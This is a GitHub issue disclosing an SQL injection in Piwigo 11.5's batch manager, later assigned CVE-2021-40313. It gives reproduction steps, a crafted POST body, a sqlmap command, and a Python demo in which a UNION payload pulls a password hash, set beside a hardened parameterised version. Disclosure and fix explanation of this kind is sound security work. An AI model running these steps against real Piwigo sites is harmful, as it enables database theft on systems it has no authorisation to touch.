
[11.5] SQL injection #1469

Closed
Y4tacker opened this issue Aug 29, 2021 · 3 comments

Comments

@Y4tacker

Y4tacker commented Aug 29, 2021

I found that there is a SQLi in Piwigo; here is my description.
First we need to log in, and then we can visit http://your-url/admin.php.
Then we need a key parameter called pwg_token; there are many ways to get a token.
I visit http://your-url/admin.php?page=user_list
Then I got pwg_token=3c28c3bf6adc56b0695cf64073605f9b
The vulnerable point is in admin/batch_manager_global.php; the parameter selection is not filtered.
The unfiltered parameter selection is spliced into the query.
The next step is to capture the request with Burp Suite and simply construct the parameters:

```
selection%5B%5D=1&selectAction=delete_derivatives&submit=1&del_derivatives_type=1&del_tags%5B%5D=1&pwg_token=4a3513cd81aa311107704fd00bde0a79
```

Remember to replace the token value above.
Save the parameters to a file, then just use sqlmap to exploit it:

```
python sqlmap.py -r 1233 --current-db
```
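The report above says the `selection` array parameter is spliced unfiltered into a SQL statement. The following is an added illustration of that bug class and of one standard hardening (it is not Piwigo's code, not its schema, and not the project's actual fix): a constructed in-memory SQLite table stands in for the images table, `select_images_vulnerable` concatenates the request values into an `IN (...)` clause the way the issue describes, and `select_images_hardened` rejects anything that is not an integer and binds the ids as parameters. `selection_from_body` shows how the `selection%5B%5D=1` body from the report is decoded into that array; the injection payload in `demo` is constructed for this example.

```python
"""
Added example, not Piwigo's code: unfiltered array parameter spliced into
an IN (...) clause versus an integer-cast, parameterised version.
"""
import sqlite3
from typing import Dict, List
from urllib.parse import parse_qs


def _db() -> sqlite3.Connection:
    # Constructed sample data; this is not Piwigo's schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE images (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO images VALUES (?, ?)",
                     [(1, "a.jpg"), (2, "b.jpg"), (3, "c.jpg")])
    # A table the batch query should never be able to read from.
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'hash-of-secret')")
    return conn


def selection_from_body(body: str) -> List[str]:
    # PHP receives selection%5B%5D=1 as $_POST['selection'] = ['1'];
    # parse_qs decodes the %5B%5D to the literal key "selection[]".
    return parse_qs(body).get("selection[]", [])


def select_images_vulnerable(conn: sqlite3.Connection, selection: List[str]) -> List[str]:
    # Vulnerable pattern: request values are joined straight into the SQL text,
    # so a value like "1) UNION SELECT ..." rewrites the statement.
    sql = "SELECT name FROM images WHERE id IN (" + ",".join(selection) + ")"
    return [row[0] for row in conn.execute(sql)]


def select_images_hardened(conn: sqlite3.Connection, selection: List[str]) -> List[str]:
    # Hardened: every element must parse as an integer (raises ValueError otherwise),
    # and the integers are bound as parameters rather than pasted into the text.
    ids = [int(value) for value in selection]
    if not ids:
        return []
    placeholders = ",".join("?" * len(ids))
    sql = f"SELECT name FROM images WHERE id IN ({placeholders})"
    return [row[0] for row in conn.execute(sql, ids)]


def demo() -> Dict[str, object]:
    conn = _db()
    legit_body = "selection%5B%5D=1&selection%5B%5D=2&selectAction=delete_derivatives"
    # Constructed injection payload: closes the IN (...) and appends a UNION.
    payload = ["1) UNION SELECT password FROM users WHERE (1=1"]
    legit = selection_from_body(legit_body)
    results: Dict[str, object] = {
        "vuln_legit": sorted(select_images_vulnerable(conn, legit)),
        "vuln_payload": sorted(select_images_vulnerable(conn, payload)),
        "safe_legit": sorted(select_images_hardened(conn, legit)),
    }
    try:
        select_images_hardened(conn, payload)
        results["safe_payload"] = "executed"
    except ValueError:
        results["safe_payload"] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable function returns the admin password hash alongside the image names for the payload; the hardened one refuses the same input before any SQL runs. Casting to int is the fix that fits an id list; where values are legitimately strings, the equivalent is binding each element as a placeholder and never concatenating it.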

@fgeek

fgeek commented Dec 7, 2021

@Stakcery why was this closed? Someone has requested a CVE identifier for this vulnerability. Please see: https://nvd.nist.gov/vuln/detail/CVE-2021-40313

@plegall is this valid and needs to be fixed?

@Y4tacker

Y4tacker commented Dec 7, 2021

I submitted this earlier and clicked close by the way

@ajakk

ajakk commented Dec 8, 2021

> I submitted this earlier and clicked close by the way

So, is this fixed? If so, what is the fixed version/commit?
